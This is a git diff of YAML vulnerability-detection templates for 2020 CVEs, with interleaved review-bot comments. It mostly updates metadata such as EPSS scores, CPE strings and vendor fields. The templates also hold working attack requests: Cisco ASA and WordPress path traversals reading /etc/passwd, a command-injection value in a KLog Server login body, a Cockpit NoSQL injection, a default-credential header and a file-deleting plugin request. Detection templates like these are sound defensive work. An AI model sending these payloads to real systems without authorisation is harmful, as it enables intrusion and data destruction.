--git a/http/cves/2020/CVE-2020-3187.yaml b/http/cves/2020/CVE-2020-3187.yaml index 6791adbb4e..aeefddef1b 100644 --- a/http/cves/2020/CVE-2020-3187.yaml +++ b/http/cves/2020/CVE-2020-3187.yaml 
@@ -15,10 +15,13 @@ info: cvss-score: 9.1 cve-id: CVE-2020-3187 cwe-id: CWE-22 - epss-score: 0.97309 - tags: cve,cve2020,cisco,packetstorm + epss-score: 0.97406 + cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: firepower_threat_defense + tags: cve,cve2020,cisco,packetstorm http: - method: GET @@ -28,10 +31,10 @@ http: matchers-condition: and matchers: - type: word + part: header words: - webvpn - Webvpn - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-3452.yaml b/http/cves/2020/CVE-2020-3452.yaml index 052fe80ff6..3621417844 100644 --- a/http/cves/2020/CVE-2020-3452.yaml +++ b/http/cves/2020/CVE-2020-3452.yaml @@ -18,18 +18,21 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-3452 - cwe-id: CWE-20 - cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* - epss-score: 0.97563 - tags: lfi,kev,packetstorm,cve,cve2020,cisco + cwe-id: CWE-22,CWE-20 + epss-score: 0.97544 + cpe: cpe:2.3:a:cisco:adaptive_security_appliance:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: cisco + product: adaptive_security_appliance + tags: lfi,kev,packetstorm,cve,cve2020,cisco http: - method: GET path: - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" - "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" + matchers: - type: word words: diff --git a/http/cves/2020/CVE-2020-35234.yaml b/http/cves/2020/CVE-2020-35234.yaml index 5a08351cf6..38c4a3d045 100644 --- a/http/cves/2020/CVE-2020-35234.yaml +++ b/http/cves/2020/CVE-2020-35234.yaml 
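Review bot: The CPE added for CVE-2020-3187, `cpe: cpe:2.3:a:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*`, uses part `a`, while the CPE added for CVE-2020-3580 further down in this diff uses `cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:*` for the same product. The part field should be the same in both templates, matching how NVD lists the product, since downstream tooling keys on the full CPE string. The `vendor`/`product` pairs are identical in both, so only the `a`/`o` character needs aligning.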
@@ -15,11 +15,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35234 cwe-id: CWE-532 - cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:*:*:* - epss-score: 0.53008 - tags: cve,cve2020,wordpress,wp-plugin,smtp + epss-score: 0.4891 + cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + framework: wordpress + vendor: wp-ecommerce + product: easy_wp_smtp + tags: cve,cve2020,wordpress,wp-plugin,smtp http: - method: GET diff --git a/http/cves/2020/CVE-2020-35338.yaml b/http/cves/2020/CVE-2020-35338.yaml index 914855b12d..af43bed792 100644 --- a/http/cves/2020/CVE-2020-35338.yaml +++ b/http/cves/2020/CVE-2020-35338.yaml @@ -14,25 +14,28 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35338 cwe-id: CWE-798 + epss-score: 0.04387 cpe: cpe:2.3:a:mobileviewpoint:wireless_multiplex_terminal_playout_server:*:*:*:*:*:*:*:* - epss-score: 0.04997 - tags: cve,cve2020,wmt,default-login metadata: max-request: 1 + vendor: mobileviewpoint + product: wireless_multiplex_terminal_playout_server + tags: cve,cve2020,wmt,default-login http: - method: GET path: - "{{BaseURL}}/server/" + headers: Authorization: "Basic OnBva29u" matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - "WMT Server playout" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35476.yaml b/http/cves/2020/CVE-2020-35476.yaml index 0e2e3809f9..bb733a54c5 100644 --- a/http/cves/2020/CVE-2020-35476.yaml +++ b/http/cves/2020/CVE-2020-35476.yaml @@ -15,12 +15,14 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35476 cwe-id: CWE-78 + epss-score: 0.96298 cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* - epss-score: 0.78489 metadata: max-request: 1 verified: true shodan-query: html:"OpenTSDB" + vendor: opentsdb + product: opentsdb tags: cve,cve2020,opentsdb,rce,packetstorm http: @@ -30,7 +32,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: 
diff --git a/http/cves/2020/CVE-2020-35489.yaml b/http/cves/2020/CVE-2020-35489.yaml index c0e155f294..9787df6907 100644 --- a/http/cves/2020/CVE-2020-35489.yaml +++ b/http/cves/2020/CVE-2020-35489.yaml @@ -10,40 +10,31 @@ info: - https://web.archive.org/web/20210125141546/https://www.getastra.com/blog/911/plugin-exploit/contact-form-7-unrestricted-file-upload-vulnerability/ - https://wordpress.org/plugins/contact-form-7/#developers - https://www.jinsonvarghese.com/unrestricted-file-upload-in-contact-form-7/ + - https://contactform7.com/2020/12/17/contact-form-7-532/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2020-35489 cwe-id: CWE-434 - cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:*:*:* - epss-score: 0.90859 - tags: cve,cve2020,wordpress,wp-plugin,rce + epss-score: 0.92295 + cpe: cpe:2.3:a:rocklobster:contact_form_7:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: rocklobster + product: contact_form_7 + tags: cve,cve2020,wordpress,wp-plugin,rce http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - - - type: regex - group: 1 - regex: - - "(?m)Stable tag: ([0-9.]+)" - matchers-condition: and matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - compare_versions(version, '< 5.3.2') - type: word part: body @@ -52,6 +43,19 @@ http: - '== Changelog ==' condition: and - - type: dsl - dsl: - - compare_versions(version, '< 5.3.2') + - type: status + status: + - 200 + + extractors: + - type: regex + name: version + group: 1 + regex: + - "(?m)Stable tag: ([0-9.]+)" + internal: true + + - type: regex + group: 1 + regex: + - "(?m)Stable tag: ([0-9.]+)" diff --git a/http/cves/2020/CVE-2020-35580.yaml b/http/cves/2020/CVE-2020-35580.yaml index ba80810853..e3c96601b3 100644 --- a/http/cves/2020/CVE-2020-35580.yaml 
+++ b/http/cves/2020/CVE-2020-35580.yaml @@ -13,12 +13,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-35580 - cwe-id: CWE-522 + cwe-id: CWE-22 + epss-score: 0.02161 cpe: cpe:2.3:a:searchblox:searchblox:*:*:*:*:*:*:*:* - epss-score: 0.02178 - tags: cve,cve2020,lfi metadata: max-request: 1 + vendor: searchblox + product: searchblox + tags: cve,cve2020,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-35598.yaml b/http/cves/2020/CVE-2020-35598.yaml index 760e355469..c9c15d6297 100644 --- a/http/cves/2020/CVE-2020-35598.yaml +++ b/http/cves/2020/CVE-2020-35598.yaml @@ -14,11 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35598 cwe-id: CWE-22 - cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:*:*:*:*:*:*:*:* - epss-score: 0.11187 - tags: acs,edb,seclists,cve,cve2020,lfi + epss-score: 0.10696 + cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: advanced_comment_system_project + product: advanced_comment_system + tags: acs,edb,seclists,cve,cve2020,lfi http: - method: GET @@ -27,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2020/CVE-2020-35713.yaml b/http/cves/2020/CVE-2020-35713.yaml index d57440e8bc..2483d1dee1 100644 --- a/http/cves/2020/CVE-2020-35713.yaml +++ b/http/cves/2020/CVE-2020-35713.yaml @@ -15,10 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35713 cwe-id: CWE-78 - epss-score: 0.97287 - tags: cve,cve2020,linksys,rce,oast,router + epss-score: 0.97277 + cpe: cpe:2.3:o:linksys:re6500_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: linksys + product: re6500_firmware + tags: cve,cve2020,linksys,rce,oast,router http: - raw: diff --git a/http/cves/2020/CVE-2020-35729.yaml b/http/cves/2020/CVE-2020-35729.yaml index 0fc7b066d9..f2340851f3 100644 --- a/http/cves/2020/CVE-2020-35729.yaml +++ b/http/cves/2020/CVE-2020-35729.yaml 
@@ -15,16 +15,19 @@ info: cvss-score: 9.8 cve-id: CVE-2020-35729 cwe-id: CWE-78 - cpe: cpe:2.3:a:klogserver:klog_server:*:*:*:*:*:*:*:* - epss-score: 0.95448 - tags: cve,cve2020,klog,rce + epss-score: 0.94817 + cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: klogserver + product: klog_server + tags: cve,cve2020,klog,rce http: - method: POST path: - "{{BaseURL}}/actions/authenticate.php" + body: 'user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo" matchers: - type: word diff --git a/http/cves/2020/CVE-2020-35736.yaml b/http/cves/2020/CVE-2020-35736.yaml index 7543c25797..23348da812 100644 --- a/http/cves/2020/CVE-2020-35736.yaml +++ b/http/cves/2020/CVE-2020-35736.yaml @@ -14,11 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-35736 cwe-id: CWE-22 - cpe: cpe:2.3:a:liftoffsoftware:gateone:*:*:*:*:*:*:*:* epss-score: 0.01553 - tags: cve,cve2020,gateone,lfi + cpe: cpe:2.3:a:liftoffsoftware:gateone:1.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: liftoffsoftware + product: gateone + tags: cve,cve2020,gateone,lfi http: - method: GET diff --git a/http/cves/2020/CVE-2020-35749.yaml b/http/cves/2020/CVE-2020-35749.yaml index 0d145d5e40..e454ddacc3 100644 --- a/http/cves/2020/CVE-2020-35749.yaml +++ b/http/cves/2020/CVE-2020-35749.yaml @@ -15,11 +15,14 @@ info: cvss-score: 7.7 cve-id: CVE-2020-35749 cwe-id: CWE-22 - cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:*:*:* epss-score: 0.01796 - tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve + cpe: cpe:2.3:a:presstigers:simple_board_job:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + framework: wordpress + vendor: presstigers + product: simple_board_job + tags: authenticated,packetstorm,wp,cve2020,lfi,wordpress,wp-plugin,wpscan,cve http: - raw: 
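Review bot: The added `body:` line in the CVE-2020-35729 hunk and its trailing comment describe different payloads: the body carries `%cG9jLXRlc3Rpbmc%3D`, where `%cG` is not a valid percent-escape and reads like a `%22` lost in front of the base64 string, while the comment says the base64 is `cHJvamVjdGRpc2NvdmVyeS5pbw==`. One of the two is stale, so the body should be checked against what the matcher (outside this hunk) expects, the escape repaired, and the comment rewritten to show the decoded form of the string that is actually sent. As written, a reader auditing the template cannot tell which value is authoritative.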
@@ -31,12 +34,12 @@ http: Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - | GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2020/CVE-2020-35774.yaml b/http/cves/2020/CVE-2020-35774.yaml index 72ba1d9252..9eecc11d60 100644 --- a/http/cves/2020/CVE-2020-35774.yaml +++ b/http/cves/2020/CVE-2020-35774.yaml @@ -16,11 +16,13 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35774 cwe-id: CWE-79 - cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* epss-score: 0.97219 - tags: cve,cve2020,xss,twitter-server + cpe: cpe:2.3:a:twitter:twitter-server:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: twitter + product: twitter-server + tags: cve,cve2020,xss,twitter-server http: - method: GET @@ -34,11 +36,11 @@ http: words: - '' - - type: status - status: - - 200 - - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-3580.yaml b/http/cves/2020/CVE-2020-3580.yaml index cfe428ad71..4291dafffa 100644 --- a/http/cves/2020/CVE-2020-3580.yaml +++ b/http/cves/2020/CVE-2020-3580.yaml @@ -15,10 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-3580 cwe-id: CWE-79 - epss-score: 0.97346 - tags: cve,cve2020,xss,cisco,kev + epss-score: 0.97233 + cpe: cpe:2.3:o:cisco:firepower_threat_defense:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: firepower_threat_defense + tags: cve,cve2020,xss,cisco,kev http: - raw: @@ -32,15 +35,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - "text/html" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35846.yaml b/http/cves/2020/CVE-2020-35846.yaml index c00f5883b9..a728d77cef 100644 --- a/http/cves/2020/CVE-2020-35846.yaml 
+++ b/http/cves/2020/CVE-2020-35846.yaml @@ -10,23 +10,25 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-35846 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 + - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35846 cwe-id: CWE-89 + epss-score: 0.84079 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - epss-score: 0.78273 - tags: cve,cve2020,nosqli,sqli,cockpit,injection metadata: max-request: 1 + vendor: agentejo + product: cockpit + tags: cve,cve2020,nosqli,sqli,cockpit,injection http: - method: POST path: - "{{BaseURL}}/auth/check" - headers: - Content-Type: application/json + body: | { "auth": { @@ -39,12 +41,16 @@ http: } } + headers: + Content-Type: application/json + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: body words: - "password_verify() expects parameter" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-35847.yaml b/http/cves/2020/CVE-2020-35847.yaml index 802b2a9832..b0282c3e01 100644 --- a/http/cves/2020/CVE-2020-35847.yaml +++ b/http/cves/2020/CVE-2020-35847.yaml @@ -11,17 +11,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-35847 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 + - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35847 cwe-id: CWE-89 + epss-score: 0.78648 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - epss-score: 0.80883 metadata: max-request: 2 shodan-query: http.favicon.hash:688609340 verified: true + vendor: agentejo + product: cockpit tags: cve,cve2020,nosqli,sqli,cockpit,injection http: 
@@ -36,7 +39,6 @@ http: "$func": "var_dump" } } - - | POST /auth/requestreset HTTP/1.1 Host: {{Hostname}} @@ -57,12 +59,12 @@ http: - type: regex part: body_1 + negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"(error404)([A-Za-z0-9-.@\s-]+)"' - negative: true - type: regex part: body_2 + negative: true regex: - 'string\([0-9]{1,3}\)(\s)?"([A-Za-z0-9-.@\s-]+)"' - negative: true diff --git a/http/cves/2020/CVE-2020-35848.yaml b/http/cves/2020/CVE-2020-35848.yaml index 131300459e..09503cef4d 100644 --- a/http/cves/2020/CVE-2020-35848.yaml +++ b/http/cves/2020/CVE-2020-35848.yaml @@ -10,23 +10,25 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-35848 - https://getcockpit.com/ - https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466 + - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-35848 cwe-id: CWE-89 + epss-score: 0.80376 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* - epss-score: 0.72481 - tags: cve,cve2020,nosqli,sqli,cockpit,injection metadata: max-request: 1 + vendor: agentejo + product: cockpit + tags: cve,cve2020,nosqli,sqli,cockpit,injection http: - method: POST path: - "{{BaseURL}}/auth/newpassword" - headers: - Content-Type: application/json + body: | { "token": { @@ -34,6 +36,8 @@ http: } } + headers: + Content-Type: application/json matchers: - type: regex part: body diff --git a/http/cves/2020/CVE-2020-35951.yaml b/http/cves/2020/CVE-2020-35951.yaml index a76e1980d1..870b298806 100644 --- a/http/cves/2020/CVE-2020-35951.yaml +++ b/http/cves/2020/CVE-2020-35951.yaml 
@@ -14,22 +14,23 @@ info: cvss-score: 9.9 cve-id: CVE-2020-35951 cwe-id: CWE-306 - cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:*:*:* - epss-score: 0.00217 - tags: cve2020,wordpress,wp-plugin,wpscan,cve + epss-score: 0.00189 + cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:* metadata: max-request: 4 + framework: wordpress + vendor: expresstech + product: quiz_and_survey_master + tags: cve2020,wordpress,wp-plugin,wpscan,cve,intrusive http: - raw: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - - | GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 Host: {{Hostname}} - - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} @@ -45,29 +46,28 @@ http: {{fullpath}}wp-content/plugins/quiz-master-next/README.md ------WebKitFormBoundaryBJ17hSJBjuGrnW92-- - - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} + req-condition: true + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master') + + - type: word + part: body + words: + - '{"type":"success","message":"File removed successfully"}' + extractors: - type: regex name: fullpath - internal: true - part: body group: 1 regex: - - "not found in ([/a-z_]+)wp" - - req-condition: true - matchers-condition: and - matchers: - - - type: word - words: - - '{"type":"success","message":"File removed successfully"}' + - not found in ([/a-z_]+)wp + internal: true part: body - - - type: dsl - dsl: - - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')" diff --git a/http/cves/2020/CVE-2020-35984.yaml b/http/cves/2020/CVE-2020-35984.yaml index 77ae78f15d..cd4c846922 100644 --- a/http/cves/2020/CVE-2020-35984.yaml +++ b/http/cves/2020/CVE-2020-35984.yaml 
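Review bot: The second CVE-2020-35951 hunk drops the double quotes from both the DSL expression and the extractor regex, leaving plain scalars that contain `'#`, `&&`, `!` and `(`; the `#` only avoids being read as a YAML comment because it is preceded by a quote rather than a space, which is fragile under later edits. The rest of this diff keeps regexes and DSL quoted (for example the CVE-2020-35847 regexes), so the previous quoted forms should be restored: `- "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"` and `- "not found in ([/a-z_]+)wp"`.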
@@ -15,10 +15,14 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35984 cwe-id: CWE-79 + epss-score: 0.00127 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 + vendor: rukovoditel + product: rukovoditel tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: @@ -26,14 +30,12 @@ http: - | GET /index.php?module=users/login HTTP/1.1 Host: {{Hostname}} - - | POST /index.php?module=users/login&action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&username={{username}}&password={{password}} - - | POST /index.php?module=users_alerts/users_alerts&action=save HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-35985.yaml b/http/cves/2020/CVE-2020-35985.yaml index a64d205dcc..ac018b6657 100644 --- a/http/cves/2020/CVE-2020-35985.yaml +++ b/http/cves/2020/CVE-2020-35985.yaml @@ -15,9 +15,13 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35985 cwe-id: CWE-79 + epss-score: 0.00127 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: max-request: 3 verified: true + vendor: rukovoditel + product: rukovoditel tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: @@ -25,14 +29,12 @@ http: - | GET /index.php?module=users/login HTTP/1.1 Host: {{Hostname}} - - | POST /index.php?module=users/login&action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&username={{username}}&password={{password}} - - | POST /index.php?module=global_lists/lists&action=save HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-35986.yaml b/http/cves/2020/CVE-2020-35986.yaml index a532006a00..ca4c5cacca 100644 --- a/http/cves/2020/CVE-2020-35986.yaml +++ b/http/cves/2020/CVE-2020-35986.yaml 
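Review bot: `verified: "true"` in the CVE-2020-35984 metadata block is a quoted string, whereas the sibling Rukovoditel templates CVE-2020-35985 and CVE-2020-35987 in this same diff use the boolean `verified: true`; CVE-2020-35986 repeats the quoted form and CVE-2020-36510 has `verified: "false"`. Since the commit is already rewriting these metadata blocks, the field should be normalised to the unquoted boolean, `verified: true` / `verified: false`, so consumers see one type for the key. These are context lines, not changed by this hunk.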
@@ -15,10 +15,14 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35986 cwe-id: CWE-79 + epss-score: 0.00127 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: verified: "true" shodan-query: http.favicon.hash:-1499940355 max-request: 3 + vendor: rukovoditel + product: rukovoditel tags: cve,cve2020,rukovoditel,stored-xss,xss,authenticated http: @@ -26,14 +30,12 @@ http: - | GET /index.php?module=users/login HTTP/1.1 Host: {{Hostname}} - - | POST /index.php?module=users/login&action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&username={{username}}&password={{password}} - - | POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml index 538054c542..20c0dc9894 100644 --- a/http/cves/2020/CVE-2020-35987.yaml +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -15,9 +15,13 @@ info: cvss-score: 5.4 cve-id: CVE-2020-35987 cwe-id: CWE-79 + epss-score: 0.00127 + cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:* metadata: max-request: 3 verified: true + vendor: rukovoditel + product: rukovoditel tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated http: @@ -25,14 +29,12 @@ http: - | GET /index.php?module=users/login HTTP/1.1 Host: {{Hostname}} - - | POST /index.php?module=users/login&action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_session_token={{nonce}}&username={{username}}&password={{password}} - - | POST /index.php?module=entities/&action=save HTTP/1.1 Host: {{Hostname}} @@ -54,7 +56,7 @@ http: extractors: - type: regex name: nonce - internal: true group: 1 regex: - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-36112.yaml b/http/cves/2020/CVE-2020-36112.yaml index 50efbefc68..1752df2d3a 100644 --- a/http/cves/2020/CVE-2020-36112.yaml 
+++ b/http/cves/2020/CVE-2020-36112.yaml @@ -14,11 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2020-36112 cwe-id: CWE-89 - cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:*:*:*:*:*:*:*:* epss-score: 0.47622 - tags: cve,cve2020,sqli,cse,edb,tenable + cpe: cpe:2.3:a:cse_bookstore_project:cse_bookstore:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cse_bookstore_project + product: cse_bookstore + tags: cve,cve2020,sqli,cse,edb,tenable http: - raw: diff --git a/http/cves/2020/CVE-2020-36289.yaml b/http/cves/2020/CVE-2020-36289.yaml index d49708d4e8..a585d37ff6 100644 --- a/http/cves/2020/CVE-2020-36289.yaml +++ b/http/cves/2020/CVE-2020-36289.yaml @@ -13,11 +13,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-36289 - cwe-id: CWE-200 - epss-score: 0.9733 + cwe-id: CWE-863 + epss-score: 0.97254 + cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.component:"Atlassian Jira" + vendor: atlassian + product: data_center tags: cve,cve2020,jira,atlassian,unauth http: @@ -27,6 +30,7 @@ http: - '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-36365.yaml b/http/cves/2020/CVE-2020-36365.yaml index a821647b36..a8f6b49430 100644 --- a/http/cves/2020/CVE-2020-36365.yaml +++ b/http/cves/2020/CVE-2020-36365.yaml @@ -14,16 +14,17 @@ info: cvss-score: 6.1 cve-id: CVE-2020-36365 cwe-id: CWE-601 - cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* epss-score: 0.00331 + cpe: cpe:2.3:a:smartstore:smartstorenet:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:'content="Smartstore' + vendor: smartstore + product: smartstorenet tags: cve,cve2020,redirect,smartstore http: - method: GET - path: - '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh' 
diff --git a/http/cves/2020/CVE-2020-36510.yaml b/http/cves/2020/CVE-2020-36510.yaml index 887f692db1..ffc6e90988 100644 --- a/http/cves/2020/CVE-2020-36510.yaml +++ b/http/cves/2020/CVE-2020-36510.yaml @@ -14,11 +14,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-36510 cwe-id: CWE-79 - cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:*:*:* epss-score: 0.00119 + cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 verified: "false" + framework: wordpress + vendor: codetipi + product: 15zine tags: xss,wordpress,wp-theme,wp,cve,cve2020,wpscan http: diff --git a/http/cves/2020/CVE-2020-4463.yaml b/http/cves/2020/CVE-2020-4463.yaml index 760e9a96d1..9dddbca03c 100644 --- a/http/cves/2020/CVE-2020-4463.yaml +++ b/http/cves/2020/CVE-2020-4463.yaml @@ -20,11 +20,13 @@ info: cvss-score: 8.2 cve-id: CVE-2020-4463 cwe-id: CWE-611 - cpe: cpe:2.3:a:ibm:maximo_asset_management:*:*:*:*:*:*:*:* - epss-score: 0.74371 + epss-score: 0.40093 + cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* metadata: max-request: 2 shodan-query: http.favicon.hash:-399298961 + vendor: ibm + product: maximo_asset_management tags: cve,cve2020,ibm,xxe,disclosure http: @@ -32,17 +34,18 @@ http: path: - "{{BaseURL}}/os/mxperson" - "{{BaseURL}}/meaweb/os/mxperson" + body: | + headers: - Content-Type: application/xml + Content-Type: "application/xml" matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2020/CVE-2020-5191.yaml b/http/cves/2020/CVE-2020-5191.yaml index 2d958368eb..be7dcf8393 100644 --- a/http/cves/2020/CVE-2020-5191.yaml +++ b/http/cves/2020/CVE-2020-5191.yaml 
